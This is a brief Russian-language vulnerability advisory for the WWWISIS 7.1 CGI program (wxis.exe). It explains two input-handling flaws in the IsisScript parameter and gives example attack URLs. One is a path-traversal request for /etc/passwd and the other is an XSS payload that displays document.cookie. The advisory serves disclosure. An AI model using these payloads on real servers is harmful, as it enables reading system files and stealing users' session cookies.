Программа: WWWISIS 7.1

Уязвимость позволяет удаленному пользователю осуществить XSS нападение и выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в IsisScript. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd

2) Уязвимость существует из-за недостаточной обработки входных данных в IsisScrip. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base= article%5Edlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base= article%5Edlibrary&fmt=iso.pft&lang=e <script>alert(document.cookie)</script>



Оставить мнение